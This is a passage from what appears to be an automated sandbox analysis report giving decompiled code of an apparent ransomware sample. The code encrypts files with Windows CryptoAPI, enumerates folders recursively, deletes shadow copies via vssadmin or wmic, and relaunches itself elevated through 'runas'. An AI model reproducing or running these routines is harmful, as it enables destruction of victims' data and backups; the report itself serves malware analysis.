                                    						 *((intOrPtr*)(_t49 - 0x14)) = GetLastError();
                                    						if( *(_t49 - 0xc) == 0) {
                                    							E0F5836C0(_t34);
                                    						}
                                    					}
                                    					CryptReleaseContext( *(_t49 - 4), 0);
                                    					LeaveCriticalSection(0xf592a48);
                                    					_t30 =  *(_t49 - 0xc);
                                    					L10:
                                    					return _t30;
                                    				}
                                    				_t36 = GetLastError();
                                    				if(_t36 != 0x80090016) {
                                    					_t30 = 0;
                                    					goto L10;
                                    				}
                                    				__imp__CryptAcquireContextW(_t49 - 4, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                    				if(_t36 != 0) {
                                    					goto L6;
                                    				}
                                    				_t30 = 0;
                                    				goto L10;
                                    			}









                                    0x0f58668d
                                    0x0f586691
                                    0x0f586699
                                    0x0f5866d1
                                    0x0f5866d1
                                    0x0f5866f4
                                    0x0f5866f6
                                    0x0f5866ff
                                    0x0f58670d
                                    0x0f586713
                                    0x0f586719
                                    0x0f586727
                                    0x0f586735
                                    0x0f58673b
                                    0x0f586744
                                    0x0f58674b
                                    0x0f586750
                                    0x0f586750
                                    0x0f58674b
                                    0x0f58675b
                                    0x0f586766
                                    0x0f58676c
                                    0x0f58676f
                                    0x0f586772
                                    0x0f586772
                                    0x0f58669b
                                    0x0f5866a6
                                    0x0f5866ca
                                    0x00000000
                                    0x0f5866ca
                                    0x0f5866b7
                                    0x0f5866bf
                                    0x00000000
                                    0x0f5866c8
                                    0x0f5866c1
                                    0x00000000

                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001), ref: 0F586691
                                    • GetLastError.KERNEL32 ref: 0F58669B
                                    • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 0F5866B7
                                    • CryptImportKey.ADVAPI32(?,?,00000000,00000000,00000000,?), ref: 0F5866EC
                                    • CryptGetKeyParam.ADVAPI32(?,00000008,?,?,00000000), ref: 0F58670D
                                    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?), ref: 0F586735
                                    • GetLastError.KERNEL32 ref: 0F58673E
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F58675B
                                    • LeaveCriticalSection.KERNEL32(0F592A48), ref: 0F586766
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Context$AcquireErrorLast$CriticalEncryptImportLeaveParamReleaseSection
                                    • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                    • API String ID: 1420411239-1948191093
                                    • Opcode ID: b5d58dd223fa5d6830e4eb284db72c60a51ccdc2d4666c6ef3dc5717b80029b4
                                    • Instruction ID: fad92f8556afac1451f49550fb1aa22346de9ed5594c33eb2ad2265e0003213e
                                    • Opcode Fuzzy Hash: b5d58dd223fa5d6830e4eb284db72c60a51ccdc2d4666c6ef3dc5717b80029b4
                                    • Instruction Fuzzy Hash: EA314D75A40305FFDB10DFA0D945FEE7BB8BB48701F104519F601FA280DBB9AA069BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0F586DF0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
                                    				void* _v12;
                                    				intOrPtr _v16;
                                    				WCHAR* _v20;
                                    				intOrPtr _v24;
                                    				struct _WIN32_FIND_DATAW _v616;
                                    				void* _t35;
                                    				signed int _t37;
                                    				int _t39;
                                    				signed int _t42;
                                    				void* _t46;
                                    				signed int* _t48;
                                    				WCHAR* _t53;
                                    				intOrPtr* _t54;
                                    				short _t57;
                                    				WCHAR* _t63;
                                    				void* _t67;
                                    
                                    				_v24 = __edx;
                                    				_t63 = __ecx;
                                    				"SVWj@h"();
                                    				if(__eax == 0 || E0F586BA0(__ecx) != 0) {
                                    					L17:
                                    					__eflags = 0;
                                    					return 0;
                                    				} else {
                                    					L0F586D40(__ecx);
                                    					_t53 =  &(_t63[lstrlenW(__ecx)]);
                                    					_v20 = _t53;
                                    					lstrcatW(_t63, "*");
                                    					_t35 = FindFirstFileW(_t63,  &_v616);
                                    					_t57 = 0;
                                    					_v12 = _t35;
                                    					 *_t53 = 0;
                                    					if(_t35 != 0xffffffff) {
                                    						_t54 = _a12;
                                    						do {
                                    							_t37 = lstrcmpW( &(_v616.cFileName), ".");
                                    							__eflags = _t37;
                                    							if(_t37 != 0) {
                                    								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
                                    								__eflags = _t42;
                                    								if(_t42 != 0) {
                                    									lstrcatW(_t63,  &(_v616.cFileName));
                                    									__eflags = _v616.dwFileAttributes & 0x00000010;
                                    									if(__eflags == 0) {
                                    										_v16 =  *_t54;
                                    										_t46 = L0F586AB0( *_t54, _t63,  &_v616, __eflags, _t57, _a4);
                                    										_t67 = _t67 + 8;
                                    										 *_t54 =  *_t54 + _t46;
                                    										asm("adc [ebx+0x4], edx");
                                    										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
                                    										if(__eflags <= 0) {
                                    											if(__eflags < 0) {
                                    												L12:
                                    												_t48 = _a8;
                                    												 *_t48 =  *_t48 + 1;
                                    												__eflags =  *_t48;
                                    											} else {
                                    												__eflags = _v16 -  *_t54;
                                    												if(_v16 <  *_t54) {
                                    													goto L12;
                                    												}
                                    											}
                                    										}
                                    									} else {
                                    										E0F586DF0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
                                    										_t67 = _t67 + 0xc;
                                    									}
                                    									_t57 = 0;
                                    									__eflags = 0;
                                    									 *_v20 = 0;
                                    								}
                                    							}
                                    							_t39 = FindNextFileW(_v12,  &_v616);
                                    							__eflags = _t39;
                                    						} while (_t39 != 0);
                                    						FindClose(_v12);
                                    						goto L17;
                                    					} else {
                                    						return 0xdeadbeaf;
                                    					}
                                    				}
                                    			}



















                                    0x0f586dfc
                                    0x0f586dff
                                    0x0f586e01
                                    0x0f586e08
                                    0x0f586f36
                                    0x0f586f36
                                    0x0f586f3c
                                    0x0f586e1d
                                    0x0f586e1d
                                    0x0f586e35
                                    0x0f586e38
                                    0x0f586e3b
                                    0x0f586e45
                                    0x0f586e4b
                                    0x0f586e4d
                                    0x0f586e50
                                    0x0f586e56
                                    0x0f586e64
                                    0x0f586e70
                                    0x0f586e7c
                                    0x0f586e82
                                    0x0f586e84
                                    0x0f586e96
                                    0x0f586e9c
                                    0x0f586e9e
                                    0x0f586ea8
                                    0x0f586eaa
                                    0x0f586eb1
                                    0x0f586ee2
                                    0x0f586ee5
                                    0x0f586eea
                                    0x0f586eed
                                    0x0f586eef
                                    0x0f586ef2
                                    0x0f586ef5
                                    0x0f586ef7
                                    0x0f586f00
                                    0x0f586f00
                                    0x0f586f03
                                    0x0f586f03
                                    0x0f586ef9
                                    0x0f586efc
                                    0x0f586efe
                                    0x00000000
                                    0x00000000
                                    0x0f586efe
                                    0x0f586ef7
                                    0x0f586eb3
                                    0x0f586ec7
                                    0x0f586ecc
                                    0x0f586ecc
                                    0x0f586f0e
                                    0x0f586f0e
                                    0x0f586f10
                                    0x0f586f10
                                    0x0f586e9e
                                    0x0f586f1d
                                    0x0f586f23
                                    0x0f586f23
                                    0x0f586f2e
                                    0x00000000
                                    0x0f586e58
                                    0x0f586e63
                                    0x0f586e63
                                    0x0f586e56

                                    APIs
                                      • Part of subcall function 0F586780: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586793
                                      • Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58685A
                                      • Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586874
                                      • Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58688E
                                      • Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F586E06,00000000,?,?), ref: 0F5868A8
                                      • Part of subcall function 0F586BA0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586BB2
                                      • Part of subcall function 0F586BA0: lstrcatW.KERNEL32(00000000,0F58FF44), ref: 0F586BC4
                                      • Part of subcall function 0F586BA0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586BD2
                                      • Part of subcall function 0F586BA0: lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586BFC
                                      • Part of subcall function 0F586BA0: lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586C12
                                      • Part of subcall function 0F586BA0: lstrcatW.KERNEL32(00000000,?), ref: 0F586C24
                                      • Part of subcall function 0F586BA0: lstrlenW.KERNEL32(00000000,?,?), ref: 0F586C2B
                                      • Part of subcall function 0F586BA0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F586C5A
                                      • Part of subcall function 0F586BA0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F586C71
                                      • Part of subcall function 0F586BA0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F586C7C
                                      • Part of subcall function 0F586BA0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F586C9A
                                      • Part of subcall function 0F586BA0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F586CAF
                                    • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586E23
                                    • lstrcatW.KERNEL32(00000000,0F58FF44), ref: 0F586E3B
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586E45
                                    • lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586E7C
                                    • lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586E96
                                    • lstrcatW.KERNEL32(00000000,?), ref: 0F586EA8
                                    • lstrcatW.KERNEL32(00000000,0F58FF7C), ref: 0F586EB9
                                    • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F586F1D
                                    • FindClose.KERNEL32(00003000,?,?), ref: 0F586F2E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$lstrcatlstrcmp$FindFolderPathSpecial$lstrlen$AllocFirstVirtual$CloseCreateNextReadSize
                                    • String ID:
                                    • API String ID: 775717952-0
                                    • Opcode ID: eb7096f8c745a9cd79bc42c0dfb2a8003c2f09aa536ee2c2e2d6ce94ab804d88
                                    • Instruction ID: 1921ea6ff382926096f9548d92552ca3f3b3b1a08fc4c7adfd421c56c616a185
                                    • Opcode Fuzzy Hash: eb7096f8c745a9cd79bc42c0dfb2a8003c2f09aa536ee2c2e2d6ce94ab804d88
                                    • Instruction Fuzzy Hash: 52319E31A00219EBCF11BF64DD849AEBBB8FF44311F0441A6E805F6202DB34AE16DB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F5834F0(CHAR* __ecx, WCHAR** __edx, WCHAR** _a4) {
                                    				int _v8;
                                    				CHAR* _v12;
                                    				WCHAR** _v16;
                                    				long _t11;
                                    				WCHAR* _t17;
                                    				WCHAR* _t18;
                                    				void* _t23;
                                    				void* _t28;
                                    				int _t29;
                                    				WCHAR** _t30;
                                    
                                    				_v16 = __edx;
                                    				_v12 = __ecx;
                                    				_t29 = 0;
                                    				_t11 = lstrlenA(__ecx);
                                    				_v8 = _t11;
                                    				_t23 = VirtualAlloc(0, _t11, 0x3000, 4);
                                    				if(_t23 != 0) {
                                    					if(CryptStringToBinaryA(_v12, 0, 1, _t23,  &_v8, 0, 0) != 0) {
                                    						_t17 = VirtualAlloc(0, 0x100, 0x3000, 4);
                                    						_t30 = _v16;
                                    						 *_t30 = _t17;
                                    						_t18 = VirtualAlloc(0, 0x100, 0x3000, 4);
                                    						_t28 = _t23;
                                    						 *_a4 = _t18;
                                    						if( *_t23 != 0x3b) {
                                    							do {
                                    								_t28 = _t28 + 1;
                                    							} while ( *_t28 != 0x3b);
                                    						}
                                    						 *_t28 = 0;
                                    						wsprintfW( *_t30, L"%S", _t23);
                                    						_t8 = _t28 + 1; // 0x2
                                    						wsprintfW( *_a4, L"%S", _t8);
                                    						_t29 = 1;
                                    					}
                                    					VirtualFree(_t23, 0, 0x8000);
                                    				}
                                    				return _t29;
                                    			}













                                    0x0f5834fa
                                    0x0f5834ff
                                    0x0f583502
                                    0x0f583504
                                    0x0f583519
                                    0x0f58351e
                                    0x0f583522
                                    0x0f58353d
                                    0x0f58354c
                                    0x0f58354e
                                    0x0f58355f
                                    0x0f583561
                                    0x0f583566
                                    0x0f58356b
                                    0x0f58356d
                                    0x0f583570
                                    0x0f583570
                                    0x0f583571
                                    0x0f583570
                                    0x0f583584
                                    0x0f583587
                                    0x0f583589
                                    0x0f583597
                                    0x0f58359c
                                    0x0f58359c
                                    0x0f5835a9
                                    0x0f5835a9
                                    0x0f5835b7

                                    APIs
                                    • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,0F583673,00000000), ref: 0F583504
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,0F583673,00000000), ref: 0F58351C
                                    • CryptStringToBinaryA.CRYPT32(0F583673,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F583535
                                    • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F583673,00000000), ref: 0F58354C
                                    • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F583673,00000000), ref: 0F583561
                                    • wsprintfW.USER32 ref: 0F583587
                                    • wsprintfW.USER32 ref: 0F583597
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,0F583673,00000000), ref: 0F5835A9
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$wsprintf$BinaryCryptFreeStringlstrlen
                                    • String ID:
                                    • API String ID: 2885909284-0
                                    • Opcode ID: 1c3e15ce2155035e1a844b310ab77a685595f73c5932aacd8e80f45a61b14a9e
                                    • Instruction ID: a83d69dc5258653c6a042d178f46c16b156452a6d42c6daa0fb1e0cc63240257
                                    • Opcode Fuzzy Hash: 1c3e15ce2155035e1a844b310ab77a685595f73c5932aacd8e80f45a61b14a9e
                                    • Instruction Fuzzy Hash: D821A571A413197FEB11AB64CC81F9ABFECEF49B50F100065F644F7281D7B56A128B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0F5845B0(void* __eflags) {
                                    				short _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				char _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				intOrPtr _v100;
                                    				intOrPtr _v104;
                                    				intOrPtr _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				char _v120;
                                    				short _v124;
                                    				intOrPtr _v128;
                                    				intOrPtr _v132;
                                    				intOrPtr _v136;
                                    				intOrPtr _v140;
                                    				intOrPtr _v144;
                                    				intOrPtr _v148;
                                    				char _v152;
                                    				short _v156;
                                    				intOrPtr _v160;
                                    				intOrPtr _v164;
                                    				intOrPtr _v168;
                                    				char _v172;
                                    				short* _v176;
                                    				short* _t51;
                                    				WCHAR* _t59;
                                    				void* _t62;
                                    				signed int _t66;
                                    				void* _t69;
                                    
                                    				if(E0F583CF0(_t62) == 0) {
                                    					_v172 = 0x63005c;
                                    					_v168 = 0x64006d;
                                    					_v8 = 0;
                                    					_t59 =  &_v172;
                                    					_v164 = 0x65002e;
                                    					_t51 =  &_v84;
                                    					_v160 = 0x650078;
                                    					_v156 = 0;
                                    					_v84 = 0x63002f;
                                    					_v80 = 0x760020;
                                    					_v76 = 0x730073;
                                    					_v72 = 0x640061;
                                    					_v68 = 0x69006d;
                                    					_v64 = 0x20006e;
                                    					_v60 = 0x650064;
                                    					_v56 = 0x65006c;
                                    					_v52 = 0x650074;
                                    					_v48 = 0x730020;
                                    					_v44 = 0x610068;
                                    					_v40 = 0x6f0064;
                                    					_v36 = 0x730077;
                                    					_v32 = 0x2f0020;
                                    					_v28 = 0x6c0061;
                                    					_v24 = 0x20006c;
                                    					_v20 = 0x71002f;
                                    					_v16 = 0x690075;
                                    					_v12 = 0x740065;
                                    				} else {
                                    					_v152 = 0x77005c;
                                    					_v148 = 0x650062;
                                    					_t59 =  &_v152;
                                    					_v144 = 0x5c006d;
                                    					_t51 =  &_v120;
                                    					_v140 = 0x6d0077;
                                    					_v136 = 0x630069;
                                    					_v132 = 0x65002e;
                                    					_v128 = 0x650078;
                                    					_v124 = 0;
                                    					_v120 = 0x680073;
                                    					_v116 = 0x640061;
                                    					_v112 = 0x77006f;
                                    					_v108 = 0x6f0063;
                                    					_v104 = 0x790070;
                                    					_v100 = 0x640020;
                                    					_v96 = 0x6c0065;
                                    					_v92 = 0x740065;
                                    					_v88 = 0x65;
                                    				}
                                    				_v176 = _t51;
                                    				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
                                    				if(_t69 != 0) {
                                    					GetSystemDirectoryW(_t69, 0x100);
                                    					lstrcatW(_t69, _t59);
                                    					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
                                    					asm("sbb edi, edi");
                                    					_t66 =  ~0x20;
                                    				} else {
                                    					_t66 = 0;
                                    				}
                                    				VirtualFree(_t69, 0, 0x8000);
                                    				return _t66;
                                    			}



















































                                    0x0f5845c6
                                    0x0f584662
                                    0x0f58466c
                                    0x0f584674
                                    0x0f58467c
                                    0x0f584680
                                    0x0f584688
                                    0x0f58468c
                                    0x0f584694
                                    0x0f584699
                                    0x0f5846a1
                                    0x0f5846a9
                                    0x0f5846b1
                                    0x0f5846b9
                                    0x0f5846c1
                                    0x0f5846c9
                                    0x0f5846d4
                                    0x0f5846df
                                    0x0f5846ea
                                    0x0f5846f5
                                    0x0f584700
                                    0x0f58470b
                                    0x0f584716
                                    0x0f584721
                                    0x0f58472c
                                    0x0f584737
                                    0x0f584742
                                    0x0f58474d
                                    0x0f5845cc
                                    0x0f5845ce
                                    0x0f5845d6
                                    0x0f5845de
                                    0x0f5845e2
                                    0x0f5845ea
                                    0x0f5845ee
                                    0x0f5845f6
                                    0x0f5845fe
                                    0x0f584606
                                    0x0f58460e
                                    0x0f584613
                                    0x0f58461b
                                    0x0f584623
                                    0x0f58462b
                                    0x0f584633
                                    0x0f58463b
                                    0x0f584643
                                    0x0f58464b
                                    0x0f584653
                                    0x0f584653
                                    0x0f584766
                                    0x0f584775
                                    0x0f584779
                                    0x0f584785
                                    0x0f58478d
                                    0x0f5847a3
                                    0x0f5847ab
                                    0x0f5847ad
                                    0x0f58477b
                                    0x0f58477b
                                    0x0f58477b
                                    0x0f5847b7
                                    0x0f5847c5

                                    APIs
                                      • Part of subcall function 0F583CF0: _memset.LIBCMT ref: 0F583D42
                                      • Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F583D66
                                      • Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F583D6A
                                      • Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F583D6E
                                      • Part of subcall function 0F583CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F583D95
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0F58476F
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0F584785
                                    • lstrcatW.KERNEL32(00000000,0063005C), ref: 0F58478D
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0F5847A3
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5847B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
                                    • String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
                                    • API String ID: 2684037697-4098772853
                                    • Opcode ID: 2721502352ce87719c533d23392500906fc6ebd20e50e51f0bcadfb3ff19e96e
                                    • Instruction ID: fb37b0ca9acd9cf7a391135b8aef121d0ef4e56d2813acd1580c48b63c9d3d27
                                    • Opcode Fuzzy Hash: 2721502352ce87719c533d23392500906fc6ebd20e50e51f0bcadfb3ff19e96e
                                    • Instruction Fuzzy Hash: 294148B0108380DFE320DF218948B5BBFE2BB85B49F10491DEA985A291C7F6854DCF97
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F583DB0(void* __ecx, void* __edx, void* __eflags) {
                                    				char _v1020;
                                    				short _v1028;
                                    				char _v1532;
                                    				short _v1540;
                                    				intOrPtr _v1548;
                                    				intOrPtr _v1552;
                                    				intOrPtr _v1556;
                                    				intOrPtr _v1560;
                                    				intOrPtr _v1564;
                                    				intOrPtr _v1568;
                                    				intOrPtr _v1572;
                                    				intOrPtr _v1576;
                                    				intOrPtr _v1580;
                                    				intOrPtr _v1584;
                                    				intOrPtr _v1588;
                                    				intOrPtr _v1592;
                                    				intOrPtr _v1596;
                                    				intOrPtr _v1600;
                                    				intOrPtr _v1604;
                                    				intOrPtr _v1608;
                                    				intOrPtr _v1612;
                                    				intOrPtr _v1616;
                                    				short _v1620;
                                    				intOrPtr _v1624;
                                    				intOrPtr _v1628;
                                    				intOrPtr _v1632;
                                    				intOrPtr _v1636;
                                    				intOrPtr _v1640;
                                    				intOrPtr _v1644;
                                    				intOrPtr _v1648;
                                    				intOrPtr _v1652;
                                    				intOrPtr _v1656;
                                    				intOrPtr _v1660;
                                    				intOrPtr _v1664;
                                    				intOrPtr _v1668;
                                    				intOrPtr _v1672;
                                    				short _v1676;
                                    				char _v1680;
                                    				int _t54;
                                    				struct HWND__* _t62;
                                    				long _t66;
                                    				void* _t76;
                                    				void* _t78;
                                    				void* _t80;
                                    
                                    				_t78 = __ecx;
                                    				_t54 = E0F583CF0(__edx);
                                    				if(_t54 != 0) {
                                    					_t54 = E0F583C70();
                                    					if(_t54 == 0) {
                                    						_v1676 = 0x770025;
                                    						_v1672 = 0x6e0069;
                                    						_v1668 = 0x690064;
                                    						_v1664 = 0x250072;
                                    						_v1660 = 0x73005c;
                                    						_v1656 = 0x730079;
                                    						_v1652 = 0x650074;
                                    						_v1648 = 0x33006d;
                                    						_v1644 = 0x5c0032;
                                    						_v1640 = 0x620077;
                                    						_v1636 = 0x6d0065;
                                    						_v1632 = 0x77005c;
                                    						_v1628 = 0x69006d;
                                    						_v1624 = 0x63;
                                    						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
                                    						_v1620 = 0x720070;
                                    						_v1616 = 0x63006f;
                                    						_v1612 = 0x730065;
                                    						_v1608 = 0x200073;
                                    						_v1604 = 0x610063;
                                    						_v1600 = 0x6c006c;
                                    						_v1596 = 0x630020;
                                    						_v1592 = 0x650072;
                                    						_v1588 = 0x740061;
                                    						_v1584 = 0x200065;
                                    						_v1580 = 0x630022;
                                    						_v1576 = 0x64006d;
                                    						_v1572 = 0x2f0020;
                                    						_v1568 = 0x200063;
                                    						_v1564 = 0x740073;
                                    						_v1560 = 0x720061;
                                    						_v1556 = 0x200074;
                                    						_v1552 = 0x730025;
                                    						_v1548 = 0x22;
                                    						wsprintfW( &_v1028,  &_v1620, _t78);
                                    						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
                                    						 *_t76 = 0x3c;
                                    						 *(_t76 + 4) = 0x40;
                                    						_t62 = GetForegroundWindow();
                                    						_t80 = 0;
                                    						 *(_t76 + 8) = _t62;
                                    						_v1680 = 0x750072;
                                    						_v1676 = 0x61006e;
                                    						_v1672 = 0x73;
                                    						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
                                    						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
                                    						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
                                    						 *(_t76 + 0x18) = 0;
                                    						 *(_t76 + 0x1c) = 0;
                                    						 *(_t76 + 0x20) = 0;
                                    						while(1) {
                                    							_t66 = ShellExecuteExW(_t76);
                                    							if(_t66 != 0) {
                                    								break;
                                    							}
                                    							_t80 = _t80 + 1;
                                    							if(_t80 < 0x64) {
                                    								continue;
                                    							}
                                    							_t54 = VirtualFree(_t76, _t66, 0x8000);
                                    							goto L6;
                                    						}
                                    						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
                                    						CloseHandle( *(_t76 + 0x38));
                                    						ExitProcess(0);
                                    					}
                                    				}
                                    				L6:
                                    				return _t54;
                                    			}















































                                    0x0f583dbf
                                    0x0f583dc1
                                    0x0f583dc8
                                    0x0f583dce
                                    0x0f583dd5
                                    0x0f583de7
                                    0x0f583df4
                                    0x0f583dfd
                                    0x0f583e05
                                    0x0f583e0d
                                    0x0f583e15
                                    0x0f583e1d
                                    0x0f583e25
                                    0x0f583e2d
                                    0x0f583e35
                                    0x0f583e3d
                                    0x0f583e45
                                    0x0f583e4d
                                    0x0f583e55
                                    0x0f583e5d
                                    0x0f583e68
                                    0x0f583e78
                                    0x0f583e81
                                    0x0f583e89
                                    0x0f583e91
                                    0x0f583e99
                                    0x0f583ea1
                                    0x0f583ea9
                                    0x0f583eb1
                                    0x0f583eb9
                                    0x0f583ec4
                                    0x0f583ecf
                                    0x0f583eda
                                    0x0f583ee5
                                    0x0f583ef0
                                    0x0f583efb
                                    0x0f583f06
                                    0x0f583f11
                                    0x0f583f1c
                                    0x0f583f27
                                    0x0f583f41
                                    0x0f583f43
                                    0x0f583f49
                                    0x0f583f50
                                    0x0f583f5c
                                    0x0f583f5e
                                    0x0f583f65
                                    0x0f583f6d
                                    0x0f583f75
                                    0x0f583f7d
                                    0x0f583f87
                                    0x0f583f91
                                    0x0f583f94
                                    0x0f583f9b
                                    0x0f583fa2
                                    0x0f583fb0
                                    0x0f583fb1
                                    0x0f583fb5
                                    0x00000000
                                    0x00000000
                                    0x0f583fb7
                                    0x0f583fbb
                                    0x00000000
                                    0x00000000
                                    0x0f583fc4
                                    0x00000000
